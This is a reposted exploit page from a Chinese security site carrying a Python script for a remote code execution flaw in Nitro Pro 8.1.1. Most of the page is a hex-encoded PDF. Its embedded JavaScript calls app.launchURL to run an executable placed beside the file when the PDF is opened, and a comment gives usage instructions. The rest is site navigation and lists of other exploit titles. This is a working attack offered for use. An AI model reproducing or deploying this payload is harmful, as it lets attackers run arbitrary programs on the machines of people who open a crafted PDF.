首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nitro Pro Remote Code Execution Exploit
来源:vfocus.net 作者:Mr.XHat 发布时间:2014-01-29  
#!\usr\bin\env python
  
# Exploit Title: Nitro Pro Remote Code Execution Exploit
# Date: 2013/03/15
# Exploit Author: Mr.XHat
# Discovered By: Mr.XHat
# Vendor Homepage: http://www.nitropdf.com/
# Version: 8.1.1 Build 12
# Tested On: WinXP SP3 EN, Win7 SP1 EN
  
# How To Use: Put Your "*.exe" File Side The Exploit.pdf File.
  
Code = (
"\x25\x50\x44\x46\x2D\x31\x2E\x37\x0D\x25\xE2\xE3\xCF\xD3"+
"\x0D\x0A\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F"+
"\x54\x79\x70\x65\x20\x2F\x43\x61\x74\x61\x6C\x6F\x67\x0D"+
"\x0A\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x20\x35\x20\x30"+
"\x20\x52\x0D\x0A\x2F\x50\x61\x67\x65\x73\x20\x34\x20\x30"+
"\x20\x52\x0D\x0A\x2F\x41\x41\x20\x3C\x3C\x2F\x57\x43\x20"+
"\x3C\x3C\x2F\x53\x20\x2F\x4A\x61\x76\x61\x53\x63\x72\x69"+
"\x70\x74\x0D\x0A\x2F\x4A\x53\x20\x28\x78\x20\x3D\x20\x22"+
"\x50\x6f\x43\x2e\x65\x78\x65"+ # PoC.exe
"\x22\x3B\x20\x61\x70\x70\x2E\x6C\x61\x75\x6E\x63\x68\x55"+
"\x52\x4C\x5C\x28\x78\x2C\x20\x74\x72\x75\x65\x5C\x29\x3B"+
"\x29\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D"+
"\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x20\x30\x20\x6F"+
"\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x6F\x64\x44\x61\x74\x65"+
"\x20\x28\x44\x3A\x32\x30\x31\x33\x30\x33\x31\x35\x31\x32"+
"\x35\x31\x31\x30\x2B\x30\x34\x27\x33\x30\x27\x29\x0D\x0A"+
"\x2F\x43\x72\x65\x61\x74\x6F\x72\x20\x28\x4E\x69\x74\x72"+
"\x6F\x20\x50\x72\x6F\x20\x38\x29\x0D\x0A\x3E\x3E\x0D\x0A"+
"\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62"+
"\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61"+
"\x67\x65\x0D\x0A\x2F\x50\x61\x72\x65\x6E\x74\x20\x34\x20"+
"\x30\x20\x52\x0D\x0A\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78"+
"\x20\x5B\x30\x2E\x30\x30\x30\x30\x20\x37\x39\x32\x2E\x30"+
"\x30\x30\x30\x20\x36\x31\x32\x2E\x30\x30\x30\x30\x20\x30"+
"\x2E\x30\x30\x30\x30\x5D\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"+
"\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D"+
"\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61\x67\x65"+
"\x73\x0D\x0A\x2F\x43\x6F\x75\x6E\x74\x20\x31\x0D\x0A\x2F"+
"\x4B\x69\x64\x73\x20\x5B\x33\x20\x30\x20\x52\x5D\x0D\x0A"+
"\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20"+
"\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65"+
"\x20\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x0D\x0A\x2F\x43"+
"\x6F\x75\x6E\x74\x20\x30\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"+
"\x64\x6F\x62\x6A\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x30\x20"+
"\x36\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20"+
"\x36\x35\x35\x33\x35\x20\x66\x0D\x0A\x30\x30\x30\x30\x30"+
"\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D"+
"\x0A\x30\x30\x30\x30\x30\x30\x30\x31\x37\x36\x20\x30\x30"+
"\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30"+
"\x32\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30"+
"\x30\x30\x30\x30\x30\x30\x33\x35\x35\x20\x30\x30\x30\x30"+
"\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x31"+
"\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61"+
"\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F\x6F\x74\x20"+
"\x31\x20\x30\x20\x52\x0D\x0A\x2F\x49\x6E\x66\x6F\x20\x32"+
"\x20\x30\x20\x52\x0D\x0A\x2F\x53\x69\x7A\x65\x20\x36\x0D"+
"\x0A\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66"+
"\x0D\x0A\x34\x36\x37\x0D\x0A\x25\x25\x45\x4F\x46\x0D\x0A"
)
  
try:
        File = open("Exploit.pdf", "w")
        File.write(Code)
        File.close()
        print "\nFile Created Successfully!"
except:
        print "\nTry Again!"
  
# END

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Simple E-Document Arbitrary Fi
·Motorola SBG6580 Cable Modem &
·Mp3info Stack Buffer Overflow
·Oracle Forms and Reports 11.1
·Ammyy Admin 3.2 - Authenticati
·PCMAN FTP 2.07 ABOR Command -
·Daum Game 1.1.0.5 ActiveX (Ico
·haneWIN DNS Server 1.5.3 - Buf
·MW6 Technologies MaxiCode Acti
·PCMAN FTP 2.07 CWD Command - B
·MW6 Technologies DataMatrix Ac
·Linux 3.4+ recvmmsg x32 compat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved